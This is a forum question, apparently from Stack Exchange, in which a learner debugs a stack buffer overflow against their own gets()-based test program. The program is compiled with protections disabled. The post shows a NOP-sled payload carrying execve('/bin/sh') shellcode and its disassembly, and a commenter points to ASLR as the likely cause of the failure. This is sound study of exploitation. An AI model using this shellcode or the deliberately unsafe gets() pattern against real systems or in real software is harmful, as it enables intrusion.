0

I want to do a buffer overflow exploit in the stack. For this i read in data via the "gets"-function. 

void ExploitMe()
{
  char buffer[256];
  gets(buffer);
}

I compile this file with 

gcc test.c -o vuln -z execstack -fno-stack-protector

I want to spawn a shell with my bufferoverflow. For this i implemented a nop-slide and put my opcodes to spawn this shell at the end of the nop-slide. After this, I override my return address to an address in my slide. Here is my memory:

0x7fffffffde40: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffde50: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffde60: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffde70: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffde80: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffde90: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffdea0: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffdeb0: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffdec0: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffded0: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffdee0: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffdef0: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffdf00: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffdf10: 0x90909090 0x2fbb4890 0x6e69622f 0x4868732f 0x7fffffffdf20: 0x5308ebc1 0x50e78948 0xe6894857 0x050f3bb0 0x7fffffffdf30: 0x42424242 0x42424242 0x42424242 0x42424242 0x7fffffffdf40: 0x42424242 0x42424242 0xffffdea0 0x00007fff

My return address is 0x00007fffffffdea0, which is an addresss in the middle of the nop-slide.

(I got the opcodes from the following assembler code:
0000000000000000 <__start>: 0: 48 bb 2f 2f 62 69 6e movabs rbx,0x68732f6e69622f2f 7: 2f 73 68 a: 48 c1 eb 08 shr rbx,0x8 e: 53 push rbx f: 48 89 e7 mov rdi,rsp 12: 50 push rax 13: 57 push rdi 14: 48 89 e6 mov rsi,rsp 17: b0 3b mov al,0x3b 19: 0f 05 syscall )


When i assemble, link and execute the assembler code, i get a shell as wanted.


When I step each instruction with gdb, a error occurs after the execution of the code to spawn a shell, but no shell is spawned.

When I execute the vulnerable program with the input like seen above outside of gdb, i get a segmentation fault.

Has anybody an idea, why i can't spawn a shell inside or outside of gdb?

I used the following examples:

Liveoverflow: youtube

Arc Network Security: youtube

I use Ubuntu 16.04 and X86-64.

Improve this question
2
  • Have you disabled ASLR so that the stack will be loaded each time at the same location? Commented Jul 24, 2019 at 16:35
  • I somehow thought ASLR is turned of by compiling with "-fno-stack-protection". But ASLR is OS made and has nothing to do with compilers ^^ Thanks @bart1e for the tipp! Commented Jul 24, 2019 at 18:48

0

Reset to default

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.